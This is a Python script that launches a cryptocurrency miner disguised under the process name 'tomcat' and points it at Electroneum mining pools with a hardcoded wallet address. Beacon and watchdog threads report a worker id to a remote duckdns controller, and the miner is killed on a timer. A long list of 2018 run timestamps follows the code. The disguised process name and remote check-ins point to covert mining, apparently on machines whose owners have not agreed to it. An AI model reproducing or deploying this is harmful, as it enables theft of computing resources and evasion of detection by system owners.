import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:19:06.126213
#2018-02-17 17:06:04.584607
#2018-02-17 18:54:01.446402
#2018-02-17 20:43:01.611667
#2018-02-17 22:30:08.143793
#2018-02-18 00:13:01.780597
#2018-02-18 02:04:06.350488
#2018-02-18 03:50:08.865912
#2018-02-18 05:37:05.940258
#2018-02-18 07:30:04.528630
#2018-02-18 09:18:05.267366
#2018-02-18 11:04:05.449013
#2018-02-18 12:51:05.824772
#2018-02-18 14:39:06.990469
#2018-02-18 16:29:04.867120
#2018-02-18 18:18:05.366010
#2018-02-18 20:03:07.293846
#2018-02-18 21:51:03.703231
#2018-02-18 23:40:03.954827
#2018-02-19 01:25:08.212185
#2018-02-19 03:14:02.218670
#2018-02-19 04:59:04.172620
#2018-02-19 06:43:02.236138
#2018-02-19 08:33:04.279912
#2018-02-19 10:22:08.791995
#2018-02-19 12:10:05.970287
#2018-02-19 13:57:06.125856
#2018-02-19 15:47:09.097393
#2018-02-19 17:35:02.035626
#2018-02-19 19:24:02.019314
#2018-02-19 21:12:04.077676
#2018-02-19 22:58:07.034080
#2018-02-20 00:42:06.746030
#2018-02-20 02:33:06.689872
#2018-02-20 04:21:01.283466
#2018-02-20 06:06:05.459075
#2018-02-20 07:51:01.916214
#2018-02-20 09:36:02.190411
#2018-02-20 11:21:07.087315
#2018-02-20 13:09:01.969049
#2018-02-20 14:52:07.123442
#2018-02-20 16:39:08.433272
#2018-02-20 18:25:09.731963
#2018-02-20 20:18:05.611986
#2018-02-20 22:05:05.568890
#2018-02-20 23:47:06.303864
#2018-02-21 01:31:08.495742
#2018-02-21 03:20:05.748139
#2018-02-21 05:09:05.073357
#2018-02-21 06:57:06.355132
#2018-02-21 08:43:01.858828
#2018-02-21 10:28:05.538147
#2018-02-21 12:18:06.516413
#2018-02-21 14:06:06.586119
#2018-02-21 15:52:07.852495
#2018-02-21 17:43:07.246118
#2018-02-21 19:29:01.801269
#2018-02-21 21:17:08.473627
#2018-02-21 23:05:03.819019
#2018-02-22 00:54:06.752084
#2018-02-22 02:42:06.114118
#2018-02-22 04:29:06.990916
#2018-02-22 06:15:05.520873
#2018-02-22 07:59:07.397571
#2018-02-22 09:48:07.838207
#2018-02-22 11:33:02.088638
#2018-02-22 13:20:09.280063
#2018-02-22 15:09:07.171992
#2018-02-22 16:53:08.576670
#2018-02-22 18:41:08.715547
#2018-02-22 20:34:05.596341
#2018-02-22 22:19:07.159985
#2018-02-23 00:05:07.005813
#2018-02-23 01:53:06.719629
#2018-02-23 03:46:04.936858
#2018-02-23 05:35:08.716529
#2018-02-23 07:19:07.526879
#2018-02-23 09:23:07.273183
#2018-02-23 11:30:10.014047
#2018-02-23 13:21:01.487242
#2018-02-23 15:08:06.040009
#2018-02-23 16:57:05.885062
#2018-02-23 18:56:07.035534
#2018-02-23 20:43:02.177071
#2018-02-23 22:29:06.961604
#2018-02-24 00:14:08.201583
#2018-02-24 02:06:04.110318
#2018-02-24 03:56:07.407998
#2018-02-24 05:43:07.289025
#2018-02-24 07:36:07.283515
#2018-02-24 09:22:04.494482
#2018-02-24 11:16:05.745671
#2018-02-24 13:05:01.624875
#2018-02-24 14:53:07.074698
#2018-02-24 16:44:02.134138
#2018-02-24 18:32:07.744325
#2018-02-24 20:19:01.517817
#2018-02-24 22:14:02.174654
#2018-02-25 02:32:05.764524
#2018-02-25 06:12:06.806358
#2018-02-25 11:40:01.931741